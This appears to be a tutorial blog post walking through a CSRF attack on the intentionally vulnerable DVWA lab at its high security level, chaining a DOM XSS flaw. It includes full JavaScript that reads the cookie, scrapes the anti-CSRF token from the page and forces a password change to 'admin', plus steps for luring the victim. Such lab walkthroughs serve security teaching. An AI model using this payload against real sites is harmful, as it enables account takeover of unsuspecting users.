DVWA CSRF (Cross-Site Request Forgery) - High level

Background: the CSRF attack flow

Experimental environment:

Simulated CSRF attack environment (an intranet environment; on the public Internet you only need to map the port, everything else is the same)

CentOS 7 DVWA server (simulated transfer system)

Kali (attacker)

Windows 10 user (victim)

1. Prerequisites:

1. Use a Chrome browser with the XSS Auditor disabled

Create a new Chrome browser shortcut

"C:\Program Files (x86)\Google\Chrome\chrome-xss.exe" is the path to my Chrome browser; yours may differ

Rename it to chrome-xss.exe from the command line (cmd)

"C:\Program Files (x86)\Google\Chrome\chrome-xss.exe" --args --disable-xss-auditor

Shortcut path + --args --disable-xss-auditor creates a Chrome browser with the XSS Auditor turned off

2. An XSS vulnerability exists through which the cookie can be obtained

XSS and CSRF are combined to change the user's password

1.2 Source code analysis

1.2.1 The high level code adds Token authentication.

(Token: ensures that each user's request is unique. The Token is generated randomly and becomes invalid after a period of time.)

The XSS (DOM) source code enforces a whitelist. We can add a # (URL fragment) so that the statements after the # are parsed by the page's own script without being transmitted to the server


1.2.2 Exploit the existing XSS vulnerability

1.2.3 Start injecting



(If the test alert does not pop up in this step, check whether the Chrome browser really has the XSS Auditor disabled.)

1.2.4 Construct the attack request

Write the code; its content is explained in the comments

// Pop up the cookie
alert(document.cookie);
// Define the page to be loaded by AJAX (the CSRF page)
var theUrl = '';
// Match the browser
var xmlhttp;
if (window.XMLHttpRequest) {
    // IE7+, Firefox, Chrome, Opera, Safari
    xmlhttp = new XMLHttpRequest();
} else {
    // IE6, IE5
    xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
var count = 0; // Count the changes, to prevent the password-change request from being submitted repeatedly
// Execute the function after the page has loaded
xmlhttp.onreadystatechange = function () {
    // Run only when the request has completed and the response status is 200
    if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
        // Store the page content in text for matching the token
        var text = xmlhttp.responseText;
        var regex = /user_token\' value\=\'(.*?)\' \/\>/; // Take out the Token with a regular expression
        var match = text.match(regex);
        // Pop up the token
        alert(match[1]);
        var token = match[1];
        // Define the payload url: bind the token matched from the page and set the new password to admin
        // (the request goes to the same CSRF page that was loaded above)
        var new_url = theUrl + '?user_token=' + token + '&password_new=admin&password_conf=admin&Change=Change'; // password change request
        // Submit new_url once in GET mode
        if (count == 0) {
            count++;
            xmlhttp.open("GET", new_url, false);
            xmlhttp.send();
        }
    }
};
// Submit theUrl in GET mode
xmlhttp.open("GET", theUrl, false);
xmlhttp.send();

1.2.5 Use the XSS (DOM) vulnerability to load the CSRF JS code and trigger the attack

The user is induced to click the constructed payload; accessing it completes the attack and changes the user's password

Windows 10 accesses <script src=""></script>

Cookie pop-up

Token pop-up

The newly obtained token pops up; it is the one used to submit the attacker's password change request


Password changed successfully

If you do not want the pop-up windows, comment out the following code: // alert(document.cookie); // alert(match[1]);

Detailed code analysis: the code is essentially an AJAX operation.

AJAX overview: AJAX is a technique for updating parts of a web page without reloading the whole page. It is not covered in detail here; if you want to know more, see the following material. Detailed introduction to AJAX: Introduction to AJAX

Exploitation principle:

1. Fetch the CSRF page content through XMLHttpRequest

2. Parse out the new Token, attach it to the submitted password parameters, and the request succeeds
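As an added illustration, not from the original post, here is a constructed Python model of the per-request token check that the high level adds, showing why it stops a blind CSRF request yet not a request built by script already running in the page. The HardenedService and its password_current field are a hypothetical hardening in the spirit of DVWA's impossible level, not DVWA's own code.

```python
import hmac
import re
import secrets

# Constructed model of the DVWA "high" level change-password flow discussed above:
# a fresh user_token is embedded in every rendered page and must accompany the next request.
class PasswordChangeService:
    def __init__(self, password="password"):
        self.password = password
        self.issued_token = None  # last token handed to this session

    def render_form(self):
        """Issue a random token and embed it the way DVWA's hidden field does."""
        self.issued_token = secrets.token_hex(16)
        return "<input type='hidden' name='user_token' value='%s' />" % self.issued_token

    def change_password(self, params):
        """High level: reject unless the submitted token matches the one issued."""
        token = params.get("user_token", "")
        if not self.issued_token or not hmac.compare_digest(token, self.issued_token):
            return "CSRF token is incorrect"
        self.issued_token = None  # single use; a replayed token fails
        if params.get("password_new") != params.get("password_conf"):
            return "Passwords did not match."
        self.password = params["password_new"]
        return "Password Changed."

class HardenedService(PasswordChangeService):
    """Hypothetical hardening (like DVWA's impossible level): also require the current password, so a token lifted from the page by injected script is not enough on its own."""
    def change_password(self, params):
        if params.get("password_current") != self.password:
            return "Current password is incorrect"
        return super().change_password(params)

# The regular expression the payload above uses to pull the token out of the HTML
TOKEN_RE = re.compile(r"user_token\' value\=\'(.*?)\' \/\>")

def demo():
    forged = {"password_new": "admin", "password_conf": "admin", "Change": "Change"}
    svc = PasswordChangeService()
    blind = svc.change_password(forged)            # classic CSRF without a token: rejected
    token = TOKEN_RE.search(svc.render_form()).group(1)  # what same-origin script can read
    with_token = svc.change_password(dict(forged, user_token=token))  # token check passes
    replay = svc.change_password(dict(forged, user_token=token))      # reused token: rejected
    hard = HardenedService()
    token2 = TOKEN_RE.search(hard.render_form()).group(1)
    hardened = hard.change_password(dict(forged, user_token=token2))  # no current password
    return blind, with_token, replay, hardened
```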

Keywords: Front-end security csrf

Added by lupld on Sun, 27 Feb 2022 08:20:21 +0200